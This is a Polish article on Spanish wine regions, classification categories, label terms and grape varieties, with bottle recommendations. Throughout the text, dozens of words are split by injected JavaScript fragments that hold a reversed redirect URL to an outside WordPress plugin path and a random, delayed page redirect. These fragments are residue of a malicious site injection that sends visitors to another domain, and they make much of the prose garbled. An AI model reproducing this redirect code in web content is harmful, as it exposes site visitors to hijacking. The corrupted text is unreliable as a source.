Hiszpania jest znana jako jeden z wiodących producentów win gronowych na świecie. Praktycznie każdy region posiada własne winiarnie, produkujące ten trunek nie tylko na własne potrzeby, ale również na eksport.
Jeszcze kilka lat temu na hiszpańską ofertę w Polsce składało się kilka win typu Rioja, niższa półka katalońskiego Miquela Torresa i dziesiątki nie wartych degustoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towania win stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tołowych za parę złotych. Hiszpania jednak stała się oczkiem w głowie kilku importerów, którzy zauważyli, że kraj ten jest źródłem znakomitych win dla prawdziwych znawców oraz setek kapitalnych butelek za parę euro.
Główne rodzaje win hiszpańskich toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to:
– wino czerwone, produkowane głownie w La Rioja oraz w toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorzeczu Duero,
– wino białe,
– wino różowe (rosatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do),
– cava – białe wino musujące, produkowane głównie w Katalonii, odpowiednik szampana,
– sherry – produkowane w Andaluzji,
– sangria – drink z czerwonego wina, soków owocowych i innych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatków, mający swe korzenie w Andaluzji.
Współczesność hiszpańskiego winiarstwa zaczęła się od win z Rioja, ale toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopiero legendarna Vega Sicilia i wina z regionu Ribera del Duero spowotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowały, że koneserzy uważniej zaczęli przyglądać się temu, co dzieje się w Hiszpanii.
Obecnie ceni się wina z regionu Rioja, gdzie są one produkowane ze szczepu Tempranillo (w Hiszpanii częstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zwanego Tintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Fino) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewającego przez różny czas w dębowych beczkach. Popularność Tempranillo wynika z faktu, że szczep zastąpił starsze lokalne odmiany w wielu częściach kraju i większość najlepszych win hiszpańskich, w tym także z Ribera del Duero, produkowanych jest przynajmniej częściowo z Tempranillo.
Jeżeli zatem smakują państwu wina hiszpańskie, prawtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobnie polubicie wyrazisty smak tego grona, które toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrze toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewa w dębie, ale także jest wystarczająco owocowe, aby można było produkować z niego lekkie, młode wina nieleżakowane w dębie.
Region Rioja jest odpowiednikiem francuskiego Bordeaux czy Burgundii. To właśnie tu markiz Riscal przywiózł z Francji pierwsze sadzonki Cabernet Sauvignon. Pierwszy zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosował toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzwania dębowe beczki, nadające od tej pory winom z Rioja intensywny aromat wanilii i masła. Jednak na znakomity rozwój tutejszego winiarstwa złożyły się dwie przyczyny: warunki klimatyczne, sprzyjające powstawaniu eleganckich win o dużym potencjale toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewania i szybka reakcja fachowców przeciw filokserze (odmiana mszycy).
Obecnie tylko w tym regionie wina mają prawo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do najbardziej prestiżowej w Hiszpanii kategorii DOC, czyli Denominacion de Origen Calificada. Wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tu wspomnieć o znakomitym winie „Becquer Cosecha 2004” (DOCa) – 100% Tempranillo, wino czerwone wytrawne, eleganckie i mięsiste, wyczuwa się wyraźne nuty owoców i dębu; „Jarrarte 2003” (DOCa), czy znanego producenta Marquesa de Riscal „Riscal 1960 Tempranillo” (delikatny i subtelny bukiet czerwonych owoców: maliny i jeżyny, o intensywnym czerwonym kolorze).
Kolejnym cenionym regionem hiszpańskim jest Nawarra (DO). Coraz częściej stanowi ona wyzwanie dla Rioja pod względem jakości. Polecane wino toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Javier Asensio Cabernet Sauvignon Reserva 1999 – intensywny aromat czarnej porzeczki, wino niezwykle skoncentrowane i harmonijne, bogate na podniebieniu.
W górnym biegu rzeki Duero znajduje się jeden z najlepszych regionów winiarskich w Hiszpanii:
Ribera Del Duero. Jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najbardziej modny i ekspansywny region DO. Pochodzą z niego wspaniałe Tintoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Fino. To tu powstało najlepsze hiszpańskie wino Vega Sicilia (treściwe, owocowe, unikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towe i fascynujące, może osiągnąć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do 16% obj. alkoholu). Wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to również wspomnieć o producentach takich win jak: „Vega Real Crianza 2003” (wino czerwone wytrawne, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewa przez kilkanaście miesięcy w dębowych beczkach, ciemny, czereśniowy kolor, w smaku i zapachu wyczuwa się nuty toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzałych owoców, zwłaszcza śliwki i czarnej porzeczki, połączone z wyraźnym posmakiem drewna świeżego dębu).
Inne regiony winiarskiej Hiszpanii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to:
– Carinena. Czerwone wina z regionu Carinena są purpurowo-czerwone, o bukiecie fiołków, pełne ciała, głębokie w smaku. Dzięki fermentacji w stali, mogą też być nieco lżejsze, łatwiejsze w piciu, szczególnie młode (joven). Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toryzowane odmiany w tym regionie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to: czerwone – Garnach, Tempranillo, Carinena; białe – Macabeo („Corona de Aragon Macabeo Disperates” – wino białe wytrawne, delikatne o intensywnym owocowym aromacie, świeże z trwałym finiszem), moscatel, chartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnay.
– Toro – powstają tu mocne i solidne wina, np. „Bajoz Crianza” – jedwabiste, ciemnoczerwone, pełne aromatów dębowej beczki, czarnych porzeczek, czekolady ze szczyptą pieprzu.
– Jumilla – region DO. Tradycyjne bardzo mocne wina. Uprawiane tu winogrona Monastrell, traktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towane we właściwy sposób, mogą dać świeże i pachnące wina, rywalizujące z Ribera del Duero. Szczególnie polecane jest wino producenta Luzon: „Castillo de Luzon Crianza 2002” – odznacza się głębokim czerwonym kolorem o odcieniu wiśni, w smaku jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doskonale zaokrąglone, pełne, o eleganckiej strukturze.
– Costers Del Segre, skąd pochodzi „Monestir del Tallat Merlot Reserva 2002” – w intensywnym bukiecie merlota odnajdziemy nuty korzenne, które przeplatają się z odcieniami kakao, dżemu truskawkowego oraz refleksami dymu.
– Jerez-Xerez-Sherry (Andaluzja), gdzie Antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tonio Barbadillo produkuje „La Cilla Pedro Ximenez” – złocistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to-brązowy kolor, w bukiecie można wyczuć wyraźną nutę słodkich rodzynek. Wino bardzo słodkie, aksamitne, pełne, o wspaniałym aromacie.
ANDRZEJ KALIŃSKI
Histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toria winiarstwa w Hiszpanii sięga bardzo odległych czasów. Około 3 000 lat temu wino w tym regionie zaczęli produkować feniccy kupcy. W 711 r. Hiszpanię najechali Maurowie i przez kilka wieków muzułmańskiego panowania przemysł winiarski przeżywał okres zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toju. Od XIV w. hiszpańskie wino znów stało się ważnym toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarem eksportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towym. W II połowie ub.w. wraz z przywróceniem demokracji, a nieco później z wejściem Hiszpanii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Unii Europejskiej zaczęły napływać środki na inwestycje. Pozwoliły one na gruntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towną modernizację przemysłu winiarskiego i znaczące podniesienie jakości produkowanego wina.
Mimo że Hiszpania ma ogromny areał winnic (chyba największy na świecie), wskutek bardzo suchego klimatu wydajność jest niska i dlatego zajmuje toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopiero trzecie miejsce pod względem ilości produkowanego wina. Produkcją zajmuje się 10 tys. winiarni w 60 apelacjach i 17 regionach wytwarzających tzw. wina regionalne.
Najważniejsze i najbardziej znane regiony winiarskie Hiszpanii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to: Rioja, Nawarra, Aragonia, Katalonia, Kastylia-León, KastyliaLa Mancha i Walencja.
Hiszpańskie prawo winiarskie przewiduje kilka kategorii win. Najwyższa, zarezerwowana dla win o unikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej jakości, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Denominación de Origen de Pago (DO Pago), następna toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Denominación de Origen Calificada (DOCa) oznaczająca wina o stałej, wysokiej jakości.
Denominación de Origen (DO) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to odpowiednik francuskiej AOC i obejmuje wina oddające charakter regionu, w którym zostały wyprodukowane. Niestety mogą być bardzo różnej jakości. Od wyśmienitych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do bardzo przeciętnych. Nieco niższą kategorią jest Vino de la tierra (Vdlt) obejmująca wina o charakterze regionalnym, wobec których wymagania są nieco mniejsze i które nie są poddawane tak ścisłej kontroli. Najniższa kategoria toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to Vino de messa (VdM) oznaczające podstawowe wino stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tołowe, na etykiecie którego nie można podawać żadnych informacji o roczniku, regionie czy szczepu winorośli.
Informacje na etykiecie hiszpańskiego wina pozwolą na wstępną orientację, z jakim trunkiem mamy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do czynienia. Będzie tam nazwa producenta, region wraz z odpowiednim znakiem (np. DOCa), rok, w którym winorośl została zebrana i określenie opisujące czas i sposób przechowywania wina. I tak: Gran Reserva oznacza, że wino spędziło w beczkach co najmniej 18 miesięcy i w sumie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewało minimum 5 lat. Reserva toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to rok toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojrzewania w beczce, a w sumie minimum 3 lata. Crianza oznacza wino starzone 6 miesięcy w beczce i 18 w butelce. Vino jóven toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wino młode przeznaczone toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do konsumpcji w następnym roku po zbiorach.
A otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to typowe dla Hiszpanii szczepy winorośli.
Wina czerwone:
Tempranillo – aromat truskawko-womalinowy z nutą palonego dębu.
Garancha – soczyste o aromacie wiśniowo-pieprznym.
Carinena – aromat czerwonych jagód
Mourvčdere – intensywny aromat lukrecji.
Wina białe:
Sauvignon Blanc – aromat agrestu.
Albarino – smak lekko brzoskwiniowy.
Verdejo – kwasowe, pełne i pikantne.
Bądź pierwszą osobą, która zostawi swój komentarz